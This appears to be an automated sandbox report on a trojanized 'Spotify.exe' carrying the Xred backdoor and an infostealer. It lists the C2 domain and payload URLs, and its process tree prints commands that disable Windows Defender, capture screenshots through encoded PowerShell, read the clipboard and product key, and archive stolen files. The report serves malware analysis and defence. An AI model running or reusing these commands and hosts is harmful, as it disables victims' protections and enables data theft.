Analysis

  • max time kernel
    142s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2024 17:55

General

  • Target

    Spotify.exe

  • Size

    8.6MB

  • MD5

    1ea664910e4d4231ed21f59af15bea5f

  • SHA1

    563660e175cf56eaeeb34bb723a7f1b0297aa4b2

  • SHA256

    10416b8b2519ca56e4d81576f492dae3b670fbb1e54ead4234b5415c5e0dcc35

  • SHA512

    636b9cb78ff616159fb74084e9d0af29a2660465faf4901954b72fb3c9f950567b8adc0e6aca78c510a03793b3b1d4fa31c7e2ea5ce517c1981016f6d4a5a298

  • SSDEEP

    196608:iLGgQdj4O9LgRRHG94UEbrURbsvnEJlQ9aNx1pLrB:iCdX2RRmqUEbwRbsvnIG92x1B1

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 32 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Spotify.exe
    "C:\Users\Admin\AppData\Local\Temp\Spotify.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Users\Admin\AppData\Local\Temp\._cache_Spotify.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Spotify.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Users\Admin\AppData\Local\Temp\Built.exe
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4832
        • C:\Users\Admin\AppData\Local\Temp\Built.exe
          "C:\Users\Admin\AppData\Local\Temp\Built.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:3316
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2664
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1868
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2552
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2656
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2960
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2292
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:432
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4628
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2352
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1252
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2356
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:932
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
            5⤵
            • Clipboard Data
            • Suspicious use of WriteProcessMemory
            PID:2808
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-Clipboard
              6⤵
              • Clipboard Data
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2308
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4480
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1600
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tree /A /F"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:528
            • C:\Windows\system32\tree.com
              tree /A /F
              6⤵
                PID:1248
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3176
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                6⤵
                • Gathers system information
                PID:2872
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3776
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2240
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a50rf1jq\a50rf1jq.cmdline"
                  7⤵
                    PID:5648
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA43F.tmp" "c:\Users\Admin\AppData\Local\Temp\a50rf1jq\CSC4A0C1776254A4C82803378B16D11F965.TMP"
                      8⤵
                        PID:5892
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  5⤵
                    PID:5164
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      6⤵
                        PID:5344
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      5⤵
                        PID:5444
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          6⤵
                            PID:5560
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          5⤵
                            PID:5596
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              6⤵
                                PID:5664
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              5⤵
                                PID:5692
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  6⤵
                                    PID:5792
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  5⤵
                                    PID:5808
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      6⤵
                                        PID:5876
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "getmac"
                                      5⤵
                                        PID:1940
                                        • C:\Windows\system32\getmac.exe
                                          getmac
                                          6⤵
                                            PID:3196
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48322\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\tz8bE.zip" *"
                                          5⤵
                                            PID:3264
                                            • C:\Users\Admin\AppData\Local\Temp\_MEI48322\rar.exe
                                              C:\Users\Admin\AppData\Local\Temp\_MEI48322\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\tz8bE.zip" *
                                              6⤵
                                              • Executes dropped EXE
                                              PID:5268
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                            5⤵
                                              PID:5408
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic os get Caption
                                                6⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5292
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                              5⤵
                                                PID:5444
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic computersystem get totalphysicalmemory
                                                  6⤵
                                                    PID:5424
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                  5⤵
                                                    PID:5592
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      6⤵
                                                        PID:2516
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                      5⤵
                                                        PID:5680
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          6⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5632
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                        5⤵
                                                          PID:5764
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic path win32_VideoController get name
                                                            6⤵
                                                            • Detects videocard installed
                                                            PID:5700
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                          5⤵
                                                            PID:5828
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                              6⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:432
                                                      • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:1864
                                                    • C:\ProgramData\Synaptics\Synaptics.exe
                                                      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                      2⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies registry class
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2740
                                                      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
                                                        3⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4904
                                                        • C:\Users\Admin\AppData\Local\Temp\Built.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1416
                                                          • C:\Users\Admin\AppData\Local\Temp\Built.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:1080
                                                        • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:4056
                                                  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                    1⤵
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    • Suspicious behavior: AddClipboardFormatListener
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:1588

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

